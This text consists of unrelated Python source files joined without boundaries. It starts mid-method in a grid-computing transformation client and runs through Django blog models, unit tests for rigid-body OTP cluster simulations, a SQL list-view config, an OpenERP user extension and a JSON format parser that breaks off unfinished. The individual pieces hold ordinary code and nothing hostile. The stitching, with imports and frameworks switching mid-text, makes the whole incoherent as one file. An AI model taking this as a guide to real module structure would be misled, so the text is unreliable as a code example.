        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformationTasks = transformationTasks + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformationTasks )

  def cleanTransformation( self, transID, rpc = '', url = '', timeout = None ):
    """ Clean the transformation, and set the status parameter (doing it here, for easier extensibility)
    """
    # Cleaning
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    res = rpcClient.cleanTransformation( transID )
    if not res['OK']:
      return res
    # Setting the status
    return self.setTransformationParameter( transID, 'Status', 'TransformationCleaned' )

  def moveFilesToDerivedTransformation( self, transDict, resetUnused = True ):
    """ move files input to a transformation, to the derived one
    """
    prod = transDict['TransformationID']
    parentProd = int( transDict.get( 'InheritedFrom', 0 ) )
    movedFiles = {}
    if not parentProd:
      gLogger.warn( "[None] [%d] .moveFilesToDerivedTransformation: Transformation was not derived..." % prod )
      return S_OK( ( parentProd, movedFiles ) )
    # get the lfns in status Unused/MaxReset of the parent production
    res = self.getTransformationFiles( condDict = {'TransformationID': parentProd, 'Status': [ 'Unused', 'MaxReset' ]} )
    if not res['OK']:
      gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error getting Unused files from transformation %s:" % ( prod, parentProd ), res['Message'] )
      return res
    parentFiles = res['Value']
    lfns = [lfnDict['LFN'] for lfnDict in parentFiles]
    if not lfns:
      gLogger.info( "[None] [%d] .moveFilesToDerivedTransformation: No files found to be moved from transformation %d" % ( prod, parentProd ) )
      return S_OK( ( parentProd, movedFiles ) )
    # get the lfns of the derived production that were Unused/MaxReset in the parent one
    res = self.getTransformationFiles( condDict = { 'TransformationID': prod, 'LFN': lfns} )
    if not res['OK']:
      gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error getting files from derived transformation" % prod, res['Message'] )
      return res
    derivedFiles = res['Value']
    suffix = '-%d' % parentProd
    derivedStatusDict = dict( [( derivedDict['LFN'], derivedDict['Status'] ) for derivedDict in derivedFiles] )
    newStatusFiles = {}
    parentStatusFiles = {}
    force = False
    for parentDict in parentFiles:
      lfn = parentDict['LFN']
      derivedStatus = derivedStatusDict.get( lfn )
      if derivedStatus:
        parentStatus = parentDict['Status']
        # files that hit MaxReset in the parent can optionally be recycled as Unused
        if resetUnused and parentStatus == 'MaxReset':
          status = 'Unused'
          moveStatus = 'Unused from MaxReset'
          force = True
        else:
          status = parentStatus
          moveStatus = parentStatus
        if derivedStatus.endswith( suffix ):
          # This file is Unused or MaxReset while it was most likely Assigned at the time of derivation
          parentStatusFiles.setdefault( 'Moved-%s' % str( prod ), [] ).append( lfn )
          newStatusFiles.setdefault( ( status, parentStatus ), [] ).append( lfn )
          movedFiles[moveStatus] = movedFiles.setdefault( moveStatus, 0 ) + 1
        elif parentDict['Status'] == 'Unused':
          # If the file was Unused already at derivation time, set it NotProcessed
          parentStatusFiles.setdefault( 'NotProcessed', [] ).append( lfn )

    # Set the status in the parent transformation first
    for status, lfnList in parentStatusFiles.items():
      for lfnChunk in breakListIntoChunks( lfnList, 5000 ):
        res = self.setFileStatusForTransformation( parentProd, status, lfnChunk )
        if not res['OK']:
          gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files in transformation %d "
                         % ( prod, status, len( lfnList ), parentProd ),
                         res['Message'] )

    # Set the status in the new transformation
    for ( status, oldStatus ), lfnList in newStatusFiles.items():
      for lfnChunk in breakListIntoChunks( lfnList, 5000 ):
        res = self.setFileStatusForTransformation( prod, status, lfnChunk, force = force )
        if not res['OK']:
          # if the derived transformation cannot be updated, roll the chunk back in the parent
          gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files; resetting them %s in transformation %d"
                         % ( prod, status, len( lfnChunk ), oldStatus, parentProd ),
                         res['Message'] )
          res = self.setFileStatusForTransformation( parentProd, oldStatus, lfnChunk )
          if not res['OK']:
            gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files in transformation %d"
                           % ( prod, oldStatus, len( lfnChunk ), parentProd ),
                           res['Message'] )

    return S_OK( ( parentProd, movedFiles ) )

  def setFileStatusForTransformation( self, transName, newLFNsStatus = {}, lfns = [], force = False,
                                          rpc = '', url = '', timeout = 120 ):
    """ sets the file status for LFNs of a transformation

        For backward compatibility purposes, the status and LFNs can be passed in 2 ways:
        - newLFNsStatus is a dictionary with the form:
          {'/this/is/an/lfn1.txt': 'StatusA', '/this/is/an/lfn2.txt': 'StatusB',  ... }
          and at this point lfns is not considered
        - newLFNsStatus is a string, that applies to all the LFNs in lfns
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    # create dictionary in case newLFNsStatus is a string
    if type( newLFNsStatus ) == type( '' ):
      newLFNsStatus = dict( [( lfn, newLFNsStatus ) for lfn in lfns ] )

    # gets status as of today
    tsFiles = self.getTransformationFiles( {'TransformationID':transName, 'LFN': newLFNsStatus.keys()} )
    if not tsFiles['OK']:
      return tsFiles
    tsFiles = tsFiles['Value']
    # FIX: initialise here -- previously this was only assigned inside the
    # "if tsFiles" branch, so an empty result raised NameError at the return
    newStatuses = {}
    if tsFiles:
      # for convenience, makes a small dictionary out of the tsFiles, with the lfn as key
      tsFilesAsDict = {}
      for tsFile in tsFiles:
        tsFilesAsDict[tsFile['LFN']] = [tsFile['Status'], tsFile['ErrorCount'], tsFile['FileID']]

      # applying the state machine to the proposed status
      newStatuses = self._applyTransformationFilesStateMachine( tsFilesAsDict, newLFNsStatus, force )

      if newStatuses:  # if there's something to update
        # must do it for the file IDs...
        newStatusForFileIDs = dict( [( tsFilesAsDict[lfn][2], newStatuses[lfn] ) for lfn in newStatuses.keys()] )
        res = rpcClient.setFileStatusForTransformation( transName, newStatusForFileIDs )
        if not res['OK']:
          return res

    return S_OK( newStatuses )

  def _applyTransformationFilesStateMachine( self, tsFilesAsDict, dictOfProposedLFNsStatus, force ):
    """ For easier extension, here we apply the state machine of the production files.
        VOs might want to replace the standard here with something they prefer.

        tsFiles is a dictionary with the lfn as key and as value a list of [Status, ErrorCount, FileID]
        dictOfNewLFNsStatus is a dictionary with the proposed status
        force is a boolean

        It returns a dictionary with the status updates
    """
    newStatuses = {}

    for lfn in dictOfProposedLFNsStatus.keys():
      if lfn not in tsFilesAsDict:
        continue
      else:
        newStatus = dictOfProposedLFNsStatus[lfn]
        # Apply optional corrections
        if tsFilesAsDict[lfn][0].lower() == 'processed' and dictOfProposedLFNsStatus[lfn].lower() != 'processed':
          # a Processed file stays Processed unless forced
          if not force:
            newStatus = 'Processed'
        elif tsFilesAsDict[lfn][0].lower() == 'maxreset':
          # a MaxReset file stays MaxReset unless forced
          if not force:
            newStatus = 'MaxReset'
        elif dictOfProposedLFNsStatus[lfn].lower() == 'unused':
          errorCount = tsFilesAsDict[lfn][1]
          # every maxResetCounter retries (10 by default) an Unused file becomes MaxReset
          if errorCount and ( ( errorCount % self.maxResetCounter ) == 0 ):
            if not force:
              newStatus = 'MaxReset'

        # only report actual changes
        if tsFilesAsDict[lfn][0].lower() != newStatus:
          newStatuses[lfn] = newStatus

    return newStatuses

  def setTransformationParameter( self, transID, paramName, paramValue, force = False,
                                      rpc = '', url = '', timeout = 120 ):
    """ Sets a transformation parameter. There's a special case when coming to setting the status of a transformation.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    if paramName.lower() == 'status':
      # get transformation Type
      transformation = self.getTransformation( transID )
      if not transformation['OK']:
        return transformation
      transformationType = transformation['Value']['Type']

      # get status as of today
      originalStatus = self.getTransformationParameters( transID, 'Status' )
      if not originalStatus['OK']:
        return originalStatus
      originalStatus = originalStatus['Value']

      transIDAsDict = {transID: [originalStatus, transformationType]}
      dictOfProposedstatus = {transID: paramValue}
      # applying the state machine to the proposed status
      value = self._applyTransformationStatusStateMachine( transIDAsDict, dictOfProposedstatus, force )
    else:
      value = paramValue

    return rpcClient.setTransformationParameter( transID, paramName, value )

  def _applyTransformationStatusStateMachine( self, transIDAsDict, dictOfProposedstatus, force ):
    """ For easier extension, here we apply the state machine of the transformation status.
        VOs might want to replace the standard here with something they prefer.

        transIDAsDict is a dictionary with the transID as key and as value a list with [Status, Type]
        dictOfProposedstatus is a dictionary with the proposed status
        force is a boolean

        It returns the new status (the standard is just doing nothing: everything is possible)
    """
    return dictOfProposedstatus.values()[0]

  #####################################################################
  #
  # These are the file catalog interface methods
  #

  def isOK( self ):
    # NOTE(review): self.valid is expected to be set by FileCatalogueBase -- confirm
    return self.valid

  def getName( self, DN = '' ):
    """ Get the file catalog type name
    """
    # NOTE(review): self.name is expected to be set by FileCatalogueBase -- confirm
    return self.name

  def addDirectory( self, path, force = False, rpc = '', url = '', timeout = None ):
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addDirectory( path, force )

  def getReplicas( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfns = res['Value'].keys()
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getReplicas( lfns )

  def addFile( self, lfn, force = False, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addFile( lfndicts, force )

  def addReplica( self, lfn, force = False, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addReplica( lfndicts, force )

  def removeFile( self, lfn, rpc = '', url = '', timeout = None ):
    """ remove the given LFNs, in chunks of 100, merging the results """
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfns = res['Value'].keys()
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    successful = {}
    failed = {}
    listOfLists = breakListIntoChunks( lfns, 100 )
    for fList in listOfLists:
      res = rpcClient.removeFile( fList )
      if not res['OK']:
        return res
      successful.update( res['Value']['Successful'] )
      failed.update( res['Value']['Failed'] )
    resDict = {'Successful': successful, 'Failed':failed}
    return S_OK( resDict )

  def removeReplica( self, lfn, rpc = '', url = '', timeout = None ):
    """ remove replicas of the given LFNs, in chunks of 100, merging the results """
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    successful = {}
    failed = {}
    # as lfndicts is a dict, the breakListIntoChunks will fail. Fake it!
    listOfDicts = []
    localdicts = {}
    for lfn, info in lfndicts.items():
      localdicts.update( { lfn : info } )
      if len( localdicts ) % 100 == 0:
        listOfDicts.append( localdicts )
        localdicts = {}
    # FIX: flush the trailing chunk -- previously any remainder of fewer
    # than 100 entries (including the whole input when < 100) was dropped
    if localdicts:
      listOfDicts.append( localdicts )
    for fDict in listOfDicts:
      res = rpcClient.removeReplica( fDict )
      if not res['OK']:
        return res
      successful.update( res['Value']['Successful'] )
      failed.update( res['Value']['Failed'] )
    resDict = {'Successful': successful, 'Failed':failed}
    return S_OK( resDict )

  def getReplicaStatus( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getReplicaStatus( lfndict )

  def setReplicaStatus( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.setReplicaStatus( lfndict )

  def setReplicaHost( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.setReplicaHost( lfndict )

  def removeDirectory( self, lfn, rpc = '', url = '', timeout = None ):
    # no-op in the transformation catalog: report success for every LFN
    return self.__returnOK( lfn )

  def createDirectory( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def createLink( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def removeLink( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def __returnOK( self, lfn ):
    """ Validate the lfn argument and report success for every entry """
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    successful = {}
    for lfn in res['Value'].keys():
      successful[lfn] = True
    resDict = {'Successful':successful, 'Failed':{}}
    return S_OK( resDict )

  def __checkArgumentFormat( self, path ):
    """ Normalise a string / list / dict of LFNs into a {lfn: value} dict """
    if type( path ) in types.StringTypes:
      urls = {path:False}
    elif type( path ) == types.ListType:
      urls = {}
      for url in path:
        urls[url] = False
    elif type( path ) == types.DictType:
      urls = path
    else:
      return S_ERROR( "TransformationClient.__checkArgumentFormat: Supplied path is not of the correct format." )
    return S_OK( urls )

from django.db import models
from django.contrib.auth.models import User
import MySQLdb

# Create your models here.

class Comentario(models.Model):
	"""A free-text comment with an automatically maintained date."""
	contenido = models.TextField(help_text='Escribe un comentario')
	# auto_now=True: Django updates this date on every save, not only on creation
	fecha_coment = models.DateField(auto_now=True)

	def __unicode__(self):
		return self.contenido
class Estado(models.Model):
	"""Lookup table of entry states, identified by name."""
	nom_estado = models.CharField(max_length=50)

	def __unicode__(self):
		# FIX: the original returned the bare name ``nom_estado``, which is
		# not a local or global -- it raised NameError; read it from self.
		return self.nom_estado

class Categoria(models.Model):
	"""A category with a name and a free-text description."""
	nombre = models.CharField(max_length=50)
	descripcion = models.TextField(help_text='Escribe una descripcion de la categoria')

class Entrada(models.Model):
	"""A blog entry with an author, a state and a single linked comment.

	NOTE(review): ``comentario`` is a ForeignKey on Entrada, so each entry
	references exactly one Comentario -- confirm this is intended rather
	than a reverse FK from Comentario to Entrada.
	"""
	autor = models.ForeignKey(User)
	comentario = models.ForeignKey(Comentario)
	estado =  models.ForeignKey(Estado)
	titulo = models.CharField(max_length=100)
	contenido = models.TextField(help_text='Redacta el contenido')
	# auto_now=True: updated on every save, so this is a "last modified" date
	fecha_pub = models.DateField(auto_now=True)

	def __unicode__(self):
		return self.titulo

class Agregador(models.Model):
	"""Aggregator linking one Entrada to any number of Categoria rows."""
	entrada = models.ForeignKey(Entrada)
	categoria = models.ManyToManyField(Categoria)
import unittest
from itertools import izip

import numpy as np
from numpy import cos, sin, pi

from pele.angleaxis import RBTopology, RigidFragment, RBPotentialWrapper
from pele.potentials import LJ
from pele.angleaxis._otp_cluster import OTPCluster
from pele.thermodynamics import get_thermodynamic_information
from pele.utils import rotations
from pele.angleaxis._aa_utils import _rot_mat_derivative, _sitedist_grad, _sitedist
from pele.angleaxis.aamindist import MeasureRigidBodyCluster


# Reference configuration for a 3-molecule OTP cluster in rigid-body
# coordinates (18 numbers = 3 molecules * 6 dof; matches the
# "nrigid * 6 == self.x0.size" assertion in TestOTPExplicit.setUp).
# Presumably 3 centre-of-mass triples followed by 3 angle-axis triples --
# TODO confirm against RBTopology's coordinate layout.
_x03 = np.array([2.550757898788, 2.591553038507, 3.696836364193, 
                2.623281513163, 3.415794212648, 3.310786279789, 
                1.791383852327, 2.264321752809, 4.306217333671, 
                0.761945654023, -0.805817782109, 1.166981882601, 
                0.442065301864, -2.747066418223, -1.784325262714, 
                -1.520905562598, 0.403670860200, -0.729768985400])
# The same configuration expanded to atomistic coordinates
# (27 numbers = 9 atoms * 3), used by test_to_atomistic.
_x03_atomistic = np.array([3.064051819556, 2.474533745459, 3.646107658946,
                            2.412011983074, 2.941152759499, 4.243695098053, 
                            2.176209893734, 2.358972610563, 3.200706335581, 
                            2.786627589565, 3.211876105193, 2.850924310983, 
                            1.962626909252, 3.436918873216, 3.370903763850,
                            3.120590040673, 3.598587659535, 3.710530764535, 
                            1.697360211099, 2.317229950712, 4.823998989452, 
                            2.283487958310, 1.840698306602, 4.168734267290, 
                            1.393303387573, 2.635037001113, 3.925918744272
                           ])

class TestOTPExplicit(unittest.TestCase):
    """Tests for a hand-built 3-molecule OTP rigid-body cluster with an LJ
    atomistic potential: energy, gradient, and rigid-body <-> atomistic
    coordinate conversion (Python 2: print statements, xrange)."""
    
    def make_otp(self):
        """this constructs a single OTP molecule"""
        otp = RigidFragment()
        # three "O" sites of unit mass; np.sin and sin are the same numpy function
        otp.add_atom("O", np.array([0.0, -2./3 * np.sin( 7.*pi/24.), 0.0]), 1.)
        otp.add_atom("O", np.array([cos( 7.*pi/24.),  1./3. * sin( 7.* pi/24.), 0.0]), 1.)
        otp.add_atom("O", np.array([-cos( 7.* pi/24.),  1./3. * sin( 7.*pi/24), 0.0]), 1.)
        otp.finalize_setup()
        return otp

    
    def setUp(self):
        """Build a 3-molecule topology, wrap an LJ potential, and load the
        reference coordinates / energy."""
        nrigid = 3
        self.topology = RBTopology()
        self.topology.add_sites([self.make_otp() for i in xrange(nrigid)])
        self.topology.finalize_setup()
        
        cartesian_potential = LJ()
        self.pot = RBPotentialWrapper(self.topology, cartesian_potential)
        
        self.x0 = _x03
        self.x0 = np.array(self.x0)
        self.e0 = -17.3387670023  # reference energy for _x03
        assert nrigid * 6 == self.x0.size
        
        self.x0atomistic = _x03_atomistic
        self.nrigid = nrigid
    
    def test_energy(self):
        """Energy at the reference coordinates matches the stored value."""
        e = self.pot.getEnergy(self.x0)
        self.assertAlmostEqual(e, self.e0, delta=1e-4)

    def test_energy_gradient(self):
        """Analytic gradient agrees with the numerical derivative."""
        e = self.pot.getEnergy(self.x0)
        gnum = self.pot.NumericalDerivative(self.x0)
         
        e2, g = self.pot.getEnergyGradient(self.x0)
        self.assertAlmostEqual(e, e2, delta=1e-4)
         
        for i in xrange(g.size):
            self.assertAlmostEqual(g[i], gnum[i], 2)
    
    def test_to_atomistic(self):
        """Rigid-body -> atomistic conversion reproduces the reference coords."""
        xatom = self.topology.to_atomistic(self.x0).flatten()
        for i in xrange(xatom.size):
            self.assertAlmostEqual(xatom[i], self.x0atomistic[i], 2)
    
    def test_site_to_atomistic(self):
        """Smoke test: print a single site's atomistic coords and gradient
        transform (no assertions)."""
        rf = self.make_otp()
        p = np.array([1., 2, 3])
        p /= np.linalg.norm(p)  # angle-axis vectors are normalised
        com = np.array([4., 5, 6])
        print "otp to atomistic"
        print rf.to_atomistic(com, p)
        

        print "otp transform grad"
        g = np.array(range(9), dtype=float).reshape([-1,3])
        print g.reshape(-1)
        
        print rf.transform_grad(p, g)
    
    def test_to_atomistic2(self):
        """Smoke test: round-trip an arbitrary configuration through the
        atomistic LJ gradient and back (no assertions)."""
        x0 = np.array(range(self.nrigid * 6), dtype=float)
        x2 = x0.reshape([-1,3])
        # normalise the angle-axis part (second half of the coordinate array)
        for p in x2[self.nrigid:,:]:
            p /= np.linalg.norm(p)
        atomistic = self.topology.to_atomistic(x0).flatten()
        
        from pele.potentials import LJ
        lj = LJ()
        e, g = lj.getEnergyGradient(atomistic.reshape(-1))
        grb = self.topology.transform_gradient(x0, g)
        rbpot = RBPotentialWrapper(self.topology, lj)
        print rbpot.getEnergy(x0)


class TestCppRBPotentialWrapper(TestOTPExplicit):
    """Re-runs the TestOTPExplicit suite and additionally checks that the
    C++ RBPotentialWrapper agrees with the Python implementation."""
    def test_pot_wrapper(self):
        """C++ and Python wrappers give the same energy and gradient."""
        from pele.angleaxis import _cpp_aa
        from pele.potentials import LJ
        rbpot_cpp = _cpp_aa.RBPotentialWrapper(self.topology, LJ())
        rbpot = RBPotentialWrapper(self.topology, LJ())
        
        self.assertAlmostEqual(rbpot_cpp.getEnergy(self.x0), 
                               rbpot.getEnergy(self.x0), 4)
        
        e1, grad1 = rbpot_cpp.getEnergyGradient(self.x0)
        e2, grad2 = rbpot.getEnergyGradient(self.x0)
        self.assertAlmostEqual(e1, e2, 4)
        for g1, g2 in zip(grad1, grad2):
            self.assertAlmostEqual(g1, g2, 3) 
#         print "energy cpp"
#         print e1, e2
#         print grad1
#         print grad2
        

# Two pre-minimised configurations of the 4-molecule OTP cluster
# (24 numbers = 4 molecules * 6 dof each); TestOTPCluster registers them
# as database minima and checks their gradient norms are small.
_x1 = np.array([ 1.9025655 ,  0.39575842,  2.70994994,  1.12711741,  0.63413933,
                1.99433564,  1.86553644,  1.71434811,  2.22927686,  0.80189315,
                1.19513512,  3.02357997,  1.25845172, -0.06244027,  1.27217385,
               -2.26564485,  0.25537024,  0.66231258, -1.49510664,  0.94428774,
               -0.04120075, -0.87664883, -0.21441754,  2.05796547])
_x2 = np.array([ 2.01932983,  0.32928065,  2.34949584,  1.12261277,  0.84195098,
                2.08827517,  1.42644916,  1.83608794,  2.23147536,  1.12872074,
                0.93206141,  3.28789605,  1.73243138, -0.1199651 ,  1.02925229,
               -1.64603729,  0.30701482,  0.90204992, -1.96259809,  0.06557119,
                0.11010908, -0.37462588, -0.42374544,  1.97728056])
 
class TestOTPCluster(unittest.TestCase):
    """End-to-end tests of the OTPCluster system class: minima database,
    basin hopping, double-ended connect and thermodynamics."""
    def setUp(self):
        """Build a 4-molecule OTP system and register the two reference
        minima _x1 / _x2 in a fresh database (seeded for determinism)."""
        np.random.seed(0)
        self.nmol = 4
        self.system = OTPCluster(self.nmol)
        pot = self.system.get_potential()
        self.db = self.system.create_database()
        self.m1 = self.db.addMinimum(pot.getEnergy(_x1), _x1)
        self.m2 = self.db.addMinimum(pot.getEnergy(_x2), _x2)
    
    def test1(self):
        """Both stored configurations are near-stationary points."""
        pot = self.system.get_potential()
        self.assertLess(np.linalg.norm(pot.getGradient(self.m1.coords)), .1)
        self.assertLess(np.linalg.norm(pot.getGradient(self.m2.coords)), .1)
    
    def test_basinhopping(self):
        """A short basin-hopping run finds at least one minimum."""
        db = self.system.create_database()
        bh = self.system.get_basinhopping(db)
        bh.setPrinting(ostream=None)  # silence per-step output
        bh.run(5)
        self.assertGreaterEqual(db.number_of_minima(), 1)

    def test_double_ended_connect(self):
        """The two minima can be connected by a transition-state path."""
        connect = self.system.get_double_ended_connect(self.m1, self.m2, self.db)
        connect.connect()
        self.assertTrue(connect.success())
        
        path = connect.returnPath()
    
    def test_thermodynamics(self):
        """Vibrational free energy data can be computed for a minimum."""
        get_thermodynamic_information(self.system, self.db, nproc=None, recalculate=True)
        self.assertIsNotNone(self.m1.fvib)
        
        mt = self.system.get_metric_tensor(self.m1.coords)
        print "metric tensor"
        print mt
    
class TestRBTopologyOTP(unittest.TestCase):
    """Tests of the rigid-body (angle-axis) topology for a 3-molecule OTP
    cluster: coordinate transforms, path alignment, zero eigenvectors and
    distance measures, each checked against hard-coded reference values.
    """
    def setUp(self):
        # Fixed seed for reproducibility of any stochastic helper.
        np.random.seed(0)
        self.nmol = 3
        self.system = OTPCluster(self.nmol)
#        pot = self.system.get_potential()
#        self.db = self.system.create_database()
#        self.m1 = self.db.addMinimum(pot.getEnergy(_x1), _x1)
#        self.m2 = self.db.addMinimum(pot.getEnergy(_x2), _x2)

        # Reference configuration: first 9 values are the 3 centre-of-mass
        # positions, the remaining 9 are angle-axis rotations -- layout
        # inferred from nmol=3; TODO confirm.
        self.x0 = np.array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 
                             0.517892, 0.575435, 0.632979, 
                             0.531891, 0.576215, 0.620539, 
                             0.540562, 0.5766, 0.612637 ])
        
        from pele.angleaxis.aamindist import TransformAngleAxisCluster
        self.topology = self.system.aatopology
        self.transform = TransformAngleAxisCluster(self.topology)
        
        # A unit-norm angle-axis vector used by several tests.
        self.p0 = np.array(range(1,4), dtype=float)
        self.p0 /= np.linalg.norm(self.p0)

    
    def test_transform_rotate(self):
        # Rotating the whole cluster must reproduce the stored reference
        # coordinates (component-wise to 5 decimal places).
        print "\ntest rotate"
        x = self.x0.copy()
        p = np.array(range(1,4), dtype=float)
        p /= np.linalg.norm(p)
        self.transform.rotate(x, rotations.aa2mx(p))
        
        xnewtrue = np.array([ 0.48757698,  0.61588594,  2.09355038,  2.02484605,  4.76822812,
                            4.81289924,  3.56211511,  8.92057031,  7.53224809,  0.71469473,
                            1.23875927,  1.36136748,  0.72426504,  1.24674367,  1.34426835,
                            0.73015833,  1.25159032,  1.33345003])
        for v1, v2 in izip(x, xnewtrue):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_align_path(self):
        # align_path must leave the first frame unchanged and map the
        # shifted second frame onto the stored reference.
        print "\ntest align_path"
        x1 = self.x0.copy()
        x2 = self.x0 + 5
        
        self.topology.align_path([x1, x2])
        
        x2true = np.array([  5.        ,   6.        ,   7.        ,   8.        ,
                             9.        ,  10.        ,  11.        ,  12.        ,
                            13.        ,   1.92786071,   1.94796529,   1.96807021,
                             1.93320298,   1.94869267,   1.96418236,   1.93645608,
                             1.94905155,   1.96164668])
        
        for v1, v2 in izip(x1, self.x0):
            self.assertAlmostEqual(v1, v2, 5)
        for v1, v2 in izip(x2, x2true):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_cpp_zero_ev(self):
        # The C++ implementation of the zero eigenvectors must agree with
        # the reference python implementation, vector by vector.
        print "\ntest zeroEV cpp"
        x = self.x0.copy()
        zev = self.topology._zeroEV_python(x)
        czev = self.topology.cpp_topology.get_zero_modes(x)
        self.assertEqual(len(czev), 6)
        for ev, cev in izip(zev, czev):
            for v1, v2 in izip(ev, cev):
                self.assertAlmostEqual(v1, v2, 5)
    
    def test_site_distance_squared(self):
        # Single-site squared distance against a hard-coded reference value.
        print "\ntest site distance squared"
        c0 = np.zeros(3)
        c1 = np.ones(3)
        p0 = self.p0.copy()
        p1 = p0 + 1
        site = self.system.make_otp()
        d2 = site.distance_squared(c0, p0, c1, p1)
        # NOTE(review): d2p is computed but only d2 is asserted.
        d2p = _sitedist(c1-c0, p0, p1, site.S, site.W, site.cog)
        self.assertAlmostEqual(d2, 10.9548367929, 5)


    def test_distance_squared(self):
        # Full-cluster squared distance: C++/primary implementation must
        # match both the reference value and the python implementation.
        print "\ntest distance squared"
        x1 = self.x0.copy()
        x2 = self.x0 + 1.1
        d2 = self.topology.distance_squared(x1, x2)
        d3 = self.topology._distance_squared_python(x1, x2)
        self.assertAlmostEqual(d2, 38.9401810973, 5)
        self.assertAlmostEqual(d2, d3, 5)
        


    def test_distance_squared_grad(self):
        # Gradient of the squared distance: check against stored reference
        # values and against the python implementation.
        print "\ntest distance squared grad"
        x1 = self.x0.copy()
        x2 = self.x0 + 1.1
        grad = self.topology.distance_squared_grad(x1, x2)
        g2 = self.topology._distance_squared_grad_python(x1, x2)
        
        gtrue = np.array([-6.6       , -6.6       , -6.6       , -6.6       , -6.6       ,
                       -6.6       , -6.6       , -6.6       , -6.6       , -1.21579025,
                       -0.07013805, -1.2988823 , -1.21331786, -0.06984532, -1.28945301,
                       -1.2116105 , -0.06975828, -1.28362943])
        for v1, v2 in izip(grad, gtrue):
            self.assertAlmostEqual(v1, v2, 5)
        for v1, v2 in izip(grad, g2):
            self.assertAlmostEqual(v1, v2, 5)
    
    def test_measure_align(self):
        # Smoke test: align a shifted copy onto the original; no assertions.
        print "\ntest measure align"
        x1 = self.x0.copy()
        x2 = self.x0 + 5.1
        x2[-1] = x1[-1] + .1
        x20 = x2.copy()
        measure = MeasureRigidBodyCluster(self.topology)
        measure.align(x1, x2)

# Run the test suite when this module is executed as a script.
if __name__ == "__main__":
    unittest.main()


# -*- coding: utf8 -*-
# Configuration constants for a paginated "document types" list view.
# SQL_CALC_FOUND_ROWS lets the total row count be fetched separately
# (FOUND_ROWS = True below); %(offset)d/%(limit)d are filled in by the caller.
SQL = """select SQL_CALC_FOUND_ROWS * FROM doc_view order by `name` asc limit %(offset)d,%(limit)d ;"""
FOUND_ROWS = True
# XML output configuration: root element name, wrappers and XSL template.
ROOT = "doc_view_list"
ROOT_PREFIX = "<doc_view_edit />"
ROOT_POSTFIX= None
XSL_TEMPLATE = "data/af-web.xsl"
EVENT = None
WHERE = ()
PARAM = None
# Russian: "List of document kinds".
TITLE="Список видов документов"
# Russian: "error retrieving the list of document kinds".
MESSAGE="ошибка получения списка видов документов"
ORDER = None

# -*- encoding: utf-8 -*-
#
#    OpenERP, Open Source Management Solution
#    This module copyright (C) 2014 Savoir-faire Linux
#    (<http://www.savoirfairelinux.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#

import logging
from openerp.osv import osv, fields

_logger = logging.getLogger(__name__)


class res_users(osv.osv):
    """Extend the core user model with a link to the external XIS user."""
    _inherit = "res.users"
    _columns = {
        # Integer id of the corresponding user in the external XIS system.
        'xis_user_external_id': fields.integer('XIS external user',
                                               required=True),
    }

"""
Contains format specification class and methods to parse it from JSON.

.. codeauthor:: Tomas Krizek <tomas.krizek1@tul.cz>
"""
import json
import re


def get_root_input_type_from_json(data):
    """Return the root input type from JSON formatted string."""
    decoded = json.loads(data)
    return parse_format(decoded)


def parse_format(data):
    """Returns root input type from data."""
    nodes = data['ist_nodes']
    root_id = nodes[0]['id']      # the first node is the root type

    # Register every recognized node by its id.
    registry = {}
    for node in nodes:
        parsed = _get_input_type(node)
        if parsed is None:
            continue
        registry[parsed['id']] = parsed

